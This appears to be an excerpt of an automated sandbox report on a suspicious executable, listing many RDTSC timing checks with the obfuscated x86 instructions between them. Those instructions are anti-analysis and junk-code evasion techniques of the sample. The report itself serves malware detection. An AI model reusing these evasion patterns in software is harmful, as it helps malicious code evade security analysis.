                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030C66 second address: 5030C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030C6A second address: 5030C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080302 second address: 508038C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4C288D0391h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F4C288D038Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b call 00007F4C288D0393h 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov eax, dword ptr [ebp+08h] 0x00000025 jmp 00007F4C288D0392h 0x0000002a and dword ptr [eax], 00000000h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F4C288D0397h 0x00000034 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 508038C second address: 50803C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4C28D8B368h 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50803C9 second address: 50803CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A4A second address: 5020A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, di 0x0000000e mov bx, 7A00h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A71 second address: 5020A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A75 second address: 5020A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A7B second address: 5020A81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020A81 second address: 5020A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080104 second address: 5080108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080108 second address: 508010C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 508010C second address: 508012F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C288D0397h 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 508012F second address: 5080133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080133 second address: 5080139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080139 second address: 508013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 508013F second address: 5080143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5050CD3 second address: 5050CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5050CD9 second address: 5050CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A29 second address: 5040A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A2D second address: 5040A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A33 second address: 5040A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C28D8B360h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4C28D8B35Ch 0x00000019 sbb eax, 2C3C8BF8h 0x0000001f jmp 00007F4C28D8B35Bh 0x00000024 popfd 0x00000025 mov si, BD2Fh 0x00000029 popad 0x0000002a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A84 second address: 5040A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5040A8A second address: 5040AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4C28D8B366h 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000024 second address: 5000029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000029 second address: 500003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, 68D8677Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 500003D second address: 5000043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000043 second address: 500008A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C28D8B35Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4C28D8B367h 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 500008A second address: 5000090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000090 second address: 50000B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, si 0x00000011 call 00007F4C28D8B364h 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50000B7 second address: 50000D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 21C6C55Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f mov bx, si 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50000D4 second address: 50000D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50000D8 second address: 50000DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50000DE second address: 5000139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 07h 0x00000005 pushfd 0x00000006 jmp 00007F4C28D8B369h 0x0000000b xor ah, 00000006h 0x0000000e jmp 00007F4C28D8B361h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 pushad 0x00000019 mov si, 0B53h 0x0000001d movzx eax, bx 0x00000020 popad 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4C28D8B367h 0x00000029 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000139 second address: 50001C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4C288D038Fh 0x00000009 or cx, 7B9Eh 0x0000000e jmp 00007F4C288D0399h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F4C288D0390h 0x0000001a add ax, 8598h 0x0000001f jmp 00007F4C288D038Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov dword ptr [esp], ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushfd 0x00000031 jmp 00007F4C288D0391h 0x00000036 xor cl, 00000036h 0x00000039 jmp 00007F4C288D0391h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50001C0 second address: 50001D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov edx, 2882FBBEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebx, dword ptr [ebp+10h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 movsx edx, ax 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50001D7 second address: 5000221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4C288D0398h 0x0000000c adc ecx, 7AEB14B8h 0x00000012 jmp 00007F4C288D038Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4C288D0395h 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000221 second address: 5000274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4C28D8B367h 0x00000011 sub si, 488Eh 0x00000016 jmp 00007F4C28D8B369h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov dx, ax 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000274 second address: 5000289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4C288D038Bh 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000289 second address: 50002A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B364h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50002A1 second address: 50002A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50002A5 second address: 50002DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c call 00007F4C28D8B35Dh 0x00000011 push eax 0x00000012 pop edx 0x00000013 pop esi 0x00000014 popad 0x00000015 xchg eax, edi 0x00000016 jmp 00007F4C28D8B366h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50002DF second address: 50002E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, ch 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50002E6 second address: 5000330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F4C28D8B360h 0x0000000b or esi, 5B5B1D58h 0x00000011 jmp 00007F4C28D8B35Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov si, bx 0x00000021 jmp 00007F4C28D8B367h 0x00000026 popad 0x00000027 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000330 second address: 50003CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 jmp 00007F4C288D0390h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 jmp 00007F4C288D038Eh 0x00000016 mov ebx, eax 0x00000018 popad 0x00000019 je 00007F4C9B65E63Eh 0x0000001f pushad 0x00000020 mov ch, F6h 0x00000022 pushfd 0x00000023 jmp 00007F4C288D038Fh 0x00000028 sbb al, FFFFFF8Eh 0x0000002b jmp 00007F4C288D0399h 0x00000030 popfd 0x00000031 popad 0x00000032 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F4C288D038Ch 0x00000040 sub eax, 3E923608h 0x00000046 jmp 00007F4C288D038Bh 0x0000004b popfd 0x0000004c mov eax, 38C5147Fh 0x00000051 popad 0x00000052 je 00007F4C9B65E5F0h 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003CD second address: 50003D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003D1 second address: 50003D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003D5 second address: 50003DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003DB second address: 50003FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0396h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003FD second address: 5000404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000404 second address: 500040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 500040C second address: 500041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ebx, 3F78506Ah 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 500041E second address: 50004AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ah, dl 0x00000008 popad 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 call 00007F4C288D0390h 0x00000018 pushfd 0x00000019 jmp 00007F4C288D0392h 0x0000001e and cx, DF88h 0x00000023 jmp 00007F4C288D038Bh 0x00000028 popfd 0x00000029 pop eax 0x0000002a popad 0x0000002b jne 00007F4C9B65E5A7h 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F4C288D0395h 0x00000038 xor si, 2EA6h 0x0000003d jmp 00007F4C288D0391h 0x00000042 popfd 0x00000043 mov ah, 91h 0x00000045 popad 0x00000046 test byte ptr [esi+48h], 00000001h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov ecx, 7C91FEEBh 0x00000052 mov ax, 9EC7h 0x00000056 popad 0x00000057 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50004AF second address: 50004CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B368h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50300D9 second address: 50300EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D038Eh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50300EB second address: 5030124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F4C28D8B366h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4C28D8B35Eh 0x00000019 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030124 second address: 503014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C288D0395h 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 503014B second address: 5030151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030151 second address: 5030155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030155 second address: 5030159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030159 second address: 503018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007F4C288D038Fh 0x00000010 sub ebx, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4C288D0391h 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 503018A second address: 503018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 503018E second address: 5030194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030194 second address: 50301EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 3Ah 0x00000005 jmp 00007F4C28D8B35Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 je 00007F4C9BAE1530h 0x0000001c pushad 0x0000001d mov eax, edi 0x0000001f mov ecx, edi 0x00000021 popad 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F4C28D8B35Dh 0x00000030 jmp 00007F4C28D8B35Bh 0x00000035 popfd 0x00000036 mov ebx, ecx 0x00000038 popad 0x00000039 mov ecx, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov ecx, edi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50301EE second address: 50301F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50301F3 second address: 5030288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C9BAE14ECh 0x0000000f jmp 00007F4C28D8B360h 0x00000014 test byte ptr [77E16968h], 00000002h 0x0000001b pushad 0x0000001c mov ecx, 2AA6051Dh 0x00000021 call 00007F4C28D8B35Ah 0x00000026 pop edx 0x00000027 popad 0x00000028 jne 00007F4C9BAE14D0h 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F4C28D8B35Ah 0x00000035 or eax, 3B2623A8h 0x0000003b jmp 00007F4C28D8B35Bh 0x00000040 popfd 0x00000041 mov esi, 2D07BA9Fh 0x00000046 popad 0x00000047 mov edx, dword ptr [ebp+0Ch] 0x0000004a pushad 0x0000004b mov ebx, esi 0x0000004d jmp 00007F4C28D8B35Ch 0x00000052 popad 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F4C28D8B35Ah 0x0000005d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030288 second address: 5030297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030297 second address: 50302E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov esi, 4731E967h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4C28D8B363h 0x00000016 add ax, 7BAEh 0x0000001b jmp 00007F4C28D8B369h 0x00000020 popfd 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 mov dx, ax 0x00000027 popad 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50302E9 second address: 5030304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
